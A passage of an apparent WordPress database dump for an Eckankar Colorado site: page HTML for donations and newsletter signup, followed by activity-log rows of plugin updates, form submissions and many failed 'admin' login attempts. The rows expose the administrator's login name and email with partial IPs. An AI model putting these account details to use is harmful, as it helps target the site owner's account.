live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(233834,39722,'_message_key','post_updated'),(233835,39722,'_user_id','2'),(233836,39722,'_user_login','S8zhaBda'),(233837,39722,'_user_email','nada@zipnadanot.org'),(233838,39722,'_server_remote_addr','76.130.120.x'),(233839,39722,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=68102&action=edit'),(233840,39723,'failed_username','admin'),(233841,39723,'server_http_user_agent','Mozilla/5.0'),(233842,39723,'_message_key','user_unknown_login_failed'),(233843,39723,'_server_remote_addr','20.38.46.x'),(233844,39724,'post_id','269247'),(233845,39724,'post_type','nf_sub'),(233846,39724,'post_title',''),(233847,39724,'_message_key','post_updated'),(233848,39724,'_server_remote_addr','76.130.120.x'),(233849,39724,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(233850,39725,'failed_username','admin'),(233851,39725,'server_http_user_agent','Mozilla/5.0'),(233852,39725,'_message_key','user_unknown_login_failed'),(233853,39725,'_server_remote_addr','20.38.46.x'),(233854,39726,'failed_username','admin'),(233855,39726,'server_http_user_agent','Mozilla/5.0'),(233856,39726,'_message_key','user_unknown_login_failed'),(233857,39726,'_server_remote_addr','20.38.46.x'),(233858,39727,'failed_username','admin'),(233859,39727,'server_http_user_agent','Mozilla/5.0'),(233860,39727,'_message_key','user_unknown_login_failed'),(233861,39727,'_server_remote_addr','20.38.46.x'),(233862,39728,'failed_username','admin'),(233863,39728,'server_http_user_agent','Mozilla/5.0'),(233864,39728,'_message_key','user_unknown_login_failed'),(233865,39728,'_server_remote_addr','20.38.46.x'),(233866,39729,'failed_username','admin'),(233867,39729,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(233868,39729,'_message_key','user_unknown_login_failed'),(233869,39729,'_server_remote_addr','94.23.61.x'),(233870,39730,'failed_username','admin'),(233871,39730,'server_http_user_agent','Mozilla/5.0'),(233872,39730,'_message_key','user_unknown_login_failed'),(233873,39730,'_server_remote_addr','20.38.46.x'),(233874,39731,'plugin_name','XML Sitemap Generator for Google'),(233875,39731,'plugin_slug','www-xml-sitemap-generator-org'),(233876,39731,'plugin_title','<a href=\"https://XmlSitemapGenerator.org\">XML Sitemap Generator for Google</a>'),(233877,39731,'plugin_description','HTML, RSS and Google XML Sitemap generator compatible with Google, Bing, Baidu, Yandex and more. <cite>By <a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>.</cite>'),(233878,39731,'plugin_author','<a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>'),(233879,39731,'plugin_version','2.0.7'),(233880,39731,'plugin_url','https://XmlSitemapGenerator.org'),(233881,39731,'_message_key','plugin_deactivated'),(233882,39731,'_user_id','2'),(233883,39731,'_user_login','S8zhaBda'),(233884,39731,'_user_email','nada@zipnadanot.org'),(233885,39731,'_server_remote_addr','76.130.120.x'),(233886,39731,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(233887,39732,'plugin_slug','google-sitemap-plugin'),(233888,39732,'plugin_name','Sitemap by BestWebSoft'),(233889,39732,'plugin_url','https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/'),(233890,39732,'plugin_version','3.2.9'),(233891,39732,'plugin_author','BestWebSoft'),(233892,39732,'plugin_requires_wp',''),(233893,39732,'plugin_requires_php',''),(233894,39732,'plugin_install_source','web'),(233895,39732,'plugin_description','Generate and add XML sitemap to WordPress website. Help search engines index your blog. <cite>By <a href=\"https://bestwebsoft.com/\">BestWebSoft</a>.</cite>'),(233896,39732,'_message_key','plugin_installed'),(233897,39732,'_user_id','2'),(233898,39732,'_user_login','S8zhaBda'),(233899,39732,'_user_email','nada@zipnadanot.org'),(233900,39732,'_server_remote_addr','76.130.120.x'),(233901,39732,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugin-install.php?s=Sitemap%2520by%2520BestWebSoft&tab=search&type=term'),(233902,39733,'plugin_name','Sitemap by BestWebSoft'),(233903,39733,'plugin_slug','google-sitemap-plugin'),(233904,39733,'plugin_title','<a href=\"https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/\">Sitemap by BestWebSoft</a>'),(233905,39733,'plugin_description','Generate and add XML sitemap to WordPress website. Help search engines index your blog. <cite>By <a href=\"https://bestwebsoft.com/\">BestWebSoft</a>.</cite>'),(233906,39733,'plugin_author','<a href=\"https://bestwebsoft.com/\">BestWebSoft</a>'),(233907,39733,'plugin_version','3.2.9'),(233908,39733,'plugin_url','https://bestwebsoft.com/products/wordpress/plugins/google-sitemap/'),(233909,39733,'_message_key','plugin_activated'),(233910,39733,'_user_id','2'),(233911,39733,'_user_login','S8zhaBda'),(233912,39733,'_user_email','nada@zipnadanot.org'),(233913,39733,'_server_remote_addr','76.130.120.x'),(233914,39733,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugin-install.php?s=Sitemap%2520by%2520BestWebSoft&tab=search&type=term'),(233915,39734,'failed_username','admin'),(233916,39734,'server_http_user_agent','Mozilla/5.0'),(233917,39734,'_message_key','user_unknown_login_failed'),(233918,39734,'_server_remote_addr','20.38.46.x'),(233919,39735,'plugin_name','XML Sitemap Generator for Google'),(233920,39735,'plugin_slug','www-xml-sitemap-generator-org'),(233921,39735,'plugin_title','<a href=\"https://XmlSitemapGenerator.org\">XML Sitemap Generator for Google</a>'),(233922,39735,'plugin_description','HTML, RSS and Google XML Sitemap generator compatible with Google, Bing, Baidu, Yandex and more. <cite>By <a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>.</cite>'),(233923,39735,'plugin_author','<a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>'),(233924,39735,'plugin_version','2.0.7'),(233925,39735,'plugin_url','https://XmlSitemapGenerator.org'),(233926,39735,'_message_key','plugin_activated'),(233927,39735,'_user_id','2'),(233928,39735,'_user_login','S8zhaBda'),(233929,39735,'_user_email','nada@zipnadanot.org'),(233930,39735,'_server_remote_addr','76.130.120.x'),(233931,39735,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(233932,39736,'plugin_name','XML Sitemap Generator for Google'),(233933,39736,'plugin_slug','www-xml-sitemap-generator-org'),(233934,39736,'plugin_title','<a href=\"https://XmlSitemapGenerator.org\">XML Sitemap Generator for Google</a>'),(233935,39736,'plugin_description','HTML, RSS and Google XML Sitemap generator compatible with Google, Bing, Baidu, Yandex and more. <cite>By <a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>.</cite>'),(233936,39736,'plugin_author','<a href=\"https://XmlSitemapGenerator.org\">XmlSitemapGenerator.org</a>'),(233937,39736,'plugin_version','2.0.7'),(233938,39736,'plugin_url','https://XmlSitemapGenerator.org'),(233939,39736,'_message_key','plugin_deactivated'),(233940,39736,'_user_id','2'),(233941,39736,'_user_login','S8zhaBda'),(233942,39736,'_user_email','nada@zipnadanot.org'),(233943,39736,'_server_remote_addr','76.130.120.x'),(233944,39736,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(233945,39737,'post_id','269248'),(233946,39737,'post_type','nf_sub'),(233947,39737,'post_title',''),(233948,39737,'_message_key','post_updated'),(233949,39737,'_server_remote_addr','76.25.167.x'),(233950,39737,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(233951,39738,'plugin_slug','wordfence'),(233952,39738,'request','{\n    \"doing_wp_cron\": \"1698163819.3568389415740966796875\"\n}'),(233953,39738,'plugin_name','Wordfence Security'),(233954,39738,'plugin_title','<a href=\"http://www.wordfence.com/\">Wordfence Security</a>'),(233955,39738,'plugin_description','Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>'),(233956,39738,'plugin_author','<a href=\"http://www.wordfence.com/\">Wordfence</a>'),(233957,39738,'plugin_version','7.10.5'),(233958,39738,'plugin_url','http://www.wordfence.com/'),(233959,39738,'plugin_prev_version','7.10.4'),(233960,39738,'_message_key','plugin_updated'),(233961,39738,'_wp_cron_running','true'),(233962,39738,'_server_remote_addr','173.231.231.x'),(233963,39739,'failed_username','admin'),(233964,39739,'server_http_user_agent','Mozilla/5.0'),(233965,39739,'_message_key','user_unknown_login_failed'),(233966,39739,'_server_remote_addr','20.38.46.x'),(233967,39740,'post_id','269249'),(233968,39740,'post_type','nf_sub'),(233969,39740,'post_title',''),(233970,39740,'_message_key','post_updated'),(233971,39740,'_server_remote_addr','76.25.167.x'),(233972,39740,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(233973,39741,'post_id','269250'),(233974,39741,'post_type','nf_sub'),(233975,39741,'post_title',''),(233976,39741,'_message_key','post_updated'),(233977,39741,'_server_remote_addr','73.98.146.x'),(233978,39741,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(233979,39742,'post_id','269251'),(233980,39742,'post_type','nf_sub'),(233981,39742,'post_title',''),(233982,39742,'_message_key','post_updated'),(233983,39742,'_server_remote_addr','73.98.146.x'),(233984,39742,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(233985,39743,'failed_username','admin'),(233986,39743,'server_http_user_agent','Mozilla/5.0'),(233987,39743,'_message_key','user_unknown_login_failed'),(233988,39743,'_server_remote_addr','20.38.46.x'),(233989,39744,'failed_username','admin'),(233990,39744,'server_http_user_agent','Mozilla/5.0'),(233991,39744,'_message_key','user_unknown_login_failed'),(233992,39744,'_server_remote_addr','20.38.46.x'),(233993,39745,'plugin_name','Post and Page Builder'),(233994,39745,'plugin_current_version','1.25.0'),(233995,39745,'plugin_new_version','1.25.1'),(233996,39745,'_message_key','plugin_update_available'),(233997,39745,'_server_remote_addr','173.231.231.x'),(233998,39746,'failed_username','admin'),(233999,39746,'server_http_user_agent','Mozilla/5.0'),(234000,39746,'_message_key','user_unknown_login_failed'),(234001,39746,'_server_remote_addr','20.38.46.x'),(234002,39747,'failed_username','admin'),(234003,39747,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(234004,39747,'_message_key','user_unknown_login_failed'),(234005,39747,'_server_remote_addr','207.46.234.x'),(234006,39748,'failed_username','admin'),(234007,39748,'server_http_user_agent','Mozilla/5.0'),(234008,39748,'_message_key','user_unknown_login_failed'),(234009,39748,'_server_remote_addr','20.38.46.x'),(234010,39749,'failed_username','admin'),(234011,39749,'server_http_user_agent','Mozilla/5.0'),(234012,39749,'_message_key','user_unknown_login_failed'),(234013,39749,'_server_remote_addr','20.38.46.x'),(234014,39750,'post_id','269252'),(234015,39750,'post_type','nf_sub'),(234016,39750,'post_title',''),(234017,39750,'_message_key','post_updated'),(234018,39750,'_server_remote_addr','104.28.33.x'),(234019,39750,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(234020,39751,'failed_username','admin'),(234021,39751,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(234022,39751,'_message_key','user_unknown_login_failed'),(234023,39751,'_server_remote_addr','69.163.224.x'),(234024,39752,'failed_username','admin'),(234025,39752,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(234026,39752,'_message_key','user_unknown_login_failed'),(234027,39752,'_server_remote_addr','43.241.70.x'),(234028,39753,'failed_username','admin'),(234029,39753,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(234030,39753,'_message_key','user_unknown_login_failed'),(234031,39753,'_server_remote_addr','66.70.170.x'),(234032,39754,'failed_username','admin'),(234033,39754,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(234034,39754,'_message_key','user_unknown_login_failed'),(234035,39754,'_server_remote_addr','125.212.209.x'),(234036,39755,'failed_username','admin'),(234037,39755,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(234038,39755,'_message_key','user_unknown_login_failed'),(234039,39755,'_server_remote_addr','103.188.174.x'),(234040,39755,'_server_http_referer','https://aqte.eu/wp-login.php'),(234041,39756,'plugin_slug','modern-events-calendar'),(234042,39756,'plugin_name','Modern Events Calendar'),(234043,39756,'plugin_title','<a href=\"http://webnus.net/modern-events-calendar/\">Modern Events Calendar</a>'),(234044,39756,'plugin_description','An awesome plugin for events calendar <cite>By <a href=\"https://webnus.net\">Webnus</a>.</cite>'),(234045,39756,'plugin_author','<a href=\"https://webnus.net\">Webnus</a>'),(234046,39756,'plugin_version','7.2.2'),(234047,39756,'plugin_url','http://webnus.net/modern-events-calendar/'),(234048,39756,'plugin_prev_version','7.2.1'),(234049,39756,'_message_key','plugin_bulk_updated'),(234050,39756,'_user_id','2'),(234051,39756,'_user_login','S8zhaBda'),(234052,39756,'_user_email','nada@zipnadanot.org'),(234053,39756,'_server_remote_addr','76.130.120.x'),(234054,39756,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(234055,39757,'plugin_slug','modula-best-grid-gallery'),(234056,39757,'plugin_name','Modula'),(234057,39757,'plugin_title','<a href=\"https://wp-modula.com/\">Modula</a>'),(234058,39757,'plugin_description','Modula is the most powerful, user-friendly WordPress gallery plugin. Add galleries, masonry grids and more in a few clicks. <cite>By <a href=\"https://www.wpchill.com/\">WPChill</a>.</cite>'),(234059,39757,'plugin_author','<a href=\"https://www.wpchill.com/\">WPChill</a>'),(234060,39757,'plugin_version','2.7.8'),(234061,39757,'plugin_url','https://wp-modula.com/'),(234062,39757,'plugin_prev_version','2.7.7'),(234063,39757,'_message_key','plugin_bulk_updated'),(234064,39757,'_user_id','2'),(234065,39757,'_user_login','S8zhaBda'),(234066,39757,'_user_email','nada@zipnadanot.org'),(234067,39757,'_server_remote_addr','76.130.120.x'),(234068,39757,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(234069,39758,'plugin_slug','post-and-page-builder'),(234070,39758,'plugin_name','Post and Page Builder'),(234071,39758,'plugin_title','<a href=\"https://www.boldgrid.com/boldgrid-editor/?utm_source=ppb-wp-repo&#038;utm_medium=plugin-uri&#038;utm_campaign=ppb\">Post and Page Builder</a>'),(234072,39758,'plugin_description','Customized drag and drop editing for posts and pages. The Post and Page Builder adds functionality to the existing TinyMCE Editor to give you easier control over your content. <cite>By <a href=\"https://www.boldgrid.com/?utm_source=ppb-wp-repo&#038;utm_medium=author-uri&#038;utm_campaign=ppb\">BoldGrid </a>.</cite>'),(234073,39758,'plugin_author','<a href=\"https://www.boldgrid.com/?utm_source=ppb-wp-repo&#038;utm_medium=author-uri&#038;utm_campaign=ppb\">BoldGrid </a>'),(234074,39758,'plugin_version','1.25.1'),(234075,39758,'plugin_url','https://www.boldgrid.com/boldgrid-editor/?utm_source=ppb-wp-repo&#038;utm_medium=plugin-uri&#038;utm_campaign=ppb'),(234076,39758,'plugin_prev_version','1.25.0'),(234077,39758,'_message_key','plugin_bulk_updated'),(234078,39758,'_user_id','2'),(234079,39758,'_user_login','S8zhaBda'),(234080,39758,'_user_email','nada@zipnadanot.org'),(234081,39758,'_server_remote_addr','76.130.120.x'),(234082,39758,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(234083,39759,'plugin_slug','insert-headers-and-footers'),(234084,39759,'plugin_name','WPCode Lite'),(234085,39759,'plugin_title','<a href=\"https://www.wpcode.com/\">WPCode Lite</a>'),(234086,39759,'plugin_description','Easily add code snippets in WordPress. Insert scripts to the header and footer, add PHP code snippets with conditional logic, insert ads pixel, custom content, and more. <cite>By <a href=\"https://www.wpcode.com/\">WPCode</a>.</cite>'),(234087,39759,'plugin_author','<a href=\"https://www.wpcode.com/\">WPCode</a>'),(234088,39759,'plugin_version','2.1.4.1'),(234089,39759,'plugin_url','https://www.wpcode.com/'),(234090,39759,'plugin_prev_version','2.1.3.1'),(234091,39759,'_message_key','plugin_bulk_updated'),(234092,39759,'_user_id','2'),(234093,39759,'_user_login','S8zhaBda'),(234094,39759,'_user_email','nada@zipnadanot.org'),(234095,39759,'_server_remote_addr','76.130.120.x'),(234096,39759,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(234097,39760,'_user_id','2'),(234098,39760,'_user_login','S8zhaBda'),(234099,39760,'_user_email','nada@zipnadanot.org'),(234100,39760,'_message_key','user_logged_out'),(234101,39760,'_server_remote_addr','76.130.120.x'),(234102,39760,'_server_http_referer','https://eckankar-colorado.org/wp-admin/index.php'),(234103,39761,'failed_username','admin'),(234104,39761,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(234105,39761,'_message_key','user_unknown_login_failed'),(234106,39761,'_server_remote_addr','69.163.224.x'),(234107,39762,'failed_username','admin'),(234108,39762,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(234109,39762,'_message_key','user_unknown_login_failed'),(234110,39762,'_server_remote_addr','167.99.87.x'),(234111,39763,'failed_username','admin'),(234112,39763,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(234113,39763,'_message_key','user_unknown_login_failed'),(234114,39763,'_server_remote_addr','120.25.104.x'),(234115,39764,'failed_username','admin'),(234116,39764,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(234117,39764,'_message_key','user_unknown_login_failed'),(234118,39764,'_server_remote_addr','34.65.234.x'),(234119,39765,'failed_username','admin'),(234120,39765,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(234121,39765,'_message_key','user_unknown_login_failed'),(234122,39765,'_server_remote_addr','107.189.11.x'),(234123,39766,'failed_username','admin'),(234124,39766,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(234125,39766,'_message_key','user_unknown_login_failed'),(234126,39766,'_server_remote_addr','178.128.26.x'),(234127,39767,'failed_username','admin'),(234128,39767,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(234129,39767,'_message_key','user_unknown_login_failed'),(234130,39767,'_xmlrpc_request','true'),(234131,39767,'_server_remote_addr','20.14.94.x'),(234132,39768,'failed_username','admin'),(234133,39768,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(234134,39768,'_message_key','user_unknown_login_failed'),(234135,39768,'_server_remote_addr','40.73.4.x'),(234136,39769,'failed_username','admin'),(234137,39769,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(234138,39769,'_message_key','user_unknown_login_failed'),(234139,39769,'_server_remote_addr','212.110.92.x'),(234140,39770,'failed_username','admin'),(234141,39770,'server_http_user_agent','Mozilla/5.0'),(234142,39770,'_message_key','user_unknown_login_failed'),(234143,39770,'_server_remote_addr','20.163.19.x'),(234144,39771,'failed_username','admin'),(234145,39771,'server_http_user_agent','Mozilla/5.0'),(234146,39771,'_message_key','user_unknown_login_failed'),(234147,39771,'_server_remote_addr','20.163.19.x'),(234148,39772,'failed_username','admin'),(234149,39772,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(234150,39772,'_message_key','user_unknown_login_failed'),(234151,39772,'_server_remote_addr','139.99.80.x'),(234152,39773,'failed_username','admin'),(234153,39773,'server_http_user_agent','Mozilla/5.0'),(234154,39773,'_message_key','user_unknown_login_failed'),(234155,39773,'_server_remote_addr','20.163.19.x'),(234156,39774,'failed_username','admin'),(234157,39774,'server_http_user_agent','Mozilla/5.0'),(234158,39774,'_message_key','user_unknown_login_failed'),(234159,39774,'_server_remote_addr','20.163.19.x'),(234160,39775,'failed_username','admin'),(234161,39775,'server_http_user_agent','Mozilla/5.0'),(234162,39775,'_message_key','user_unknown_login_failed'),(234163,39775,'_server_remote_addr','20.163.19.x'),(234164,39776,'failed_username','admin'),(234165,39776,'server_http_user_agent','Mozilla/5.0'),(234166,39776,'_message_key','user_unknown_login_failed'),(234167,39776,'_server_remote_addr','20.163.19.x'),(234168,39777,'failed_username','admin'),(234169,39777,'server_http_user_agent','Mozilla/5.0'),(234170,39777,'_message_key','user_unknown_login_failed'),(234171,39777,'_server_remote_addr','20.163.19.x'),(234172,39778,'failed_username','admin'),(234173,39778,'server_http_user_agent','Mozilla/5.0'),(234174,39778,'_message_key','user_unknown_login_failed'),(234175,39778,'_server_remote_addr','20.163.19.x'),(234176,39779,'failed_username','admin'),(234177,39779,'server_http_user_agent','Mozilla/5.0'),(234178,39779,'_message_key','user_unknown_login_failed'),(234179,39779,'_server_remote_addr','20.163.19.x'),(234180,39780,'failed_username','admin'),(234181,39780,'server_http_user_agent','Mozilla/5.0'),(234182,39780,'_message_key','user_unknown_login_failed'),(234183,39780,'_server_remote_addr','20.163.19.x'),(234184,39781,'failed_username','admin'),(234185,39781,'server_http_user_agent','Mozilla/5.0'),(234186,39781,'_message_key','user_unknown_login_failed'),(234187,39781,'_server_remote_addr','20.163.19.x'),(234188,39782,'failed_username','admin'),(234189,39782,'server_http_user_agent','Mozilla/5.0'),(234190,39782,'_message_key','user_unknown_login_failed'),(234191,39782,'_server_remote_addr','20.163.19.x'),(234192,39783,'failed_username','admin'),(234193,39783,'server_http_user_agent','Mozilla/5.0'),(234194,39783,'_message_key','user_unknown_login_failed'),(234195,39783,'_server_remote_addr','20.163.19.x'),(234196,39784,'failed_username','admin'),(234197,39784,'server_http_user_agent','Mozilla/5.0'),(234198,39784,'_message_key','user_unknown_login_failed'),(234199,39784,'_server_remote_addr','20.163.19.x'),(234200,39785,'failed_username','admin'),(234201,39785,'server_http_user_agent','Mozilla/5.0'),(234202,39785,'_message_key','user_unknown_login_failed'),(234203,39785,'_server_remote_addr','20.163.19.x'),(234204,39786,'failed_username','admin'),(234205,39786,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(234206,39786,'_message_key','user_unknown_login_failed'),(234207,39786,'_server_remote_addr','47.242.181.x'),(234208,39787,'failed_username','admin'),(234209,39787,'server_http_user_agent','Mozilla/5.0'),(234210,39787,'_message_key','user_unknown_login_failed'),(234211,39787,'_server_remote_addr','20.163.19.x'),(234212,39788,'failed_username','admin'),(234213,39788,'server_http_user_agent','Mozilla/5.0'),(234214,39788,'_message_key','user_unknown_login_failed'),(234215,39788,'_server_remote_addr','20.163.19.x'),(234216,39789,'plugin_name','Backup Duplicator &amp; Migration - WP 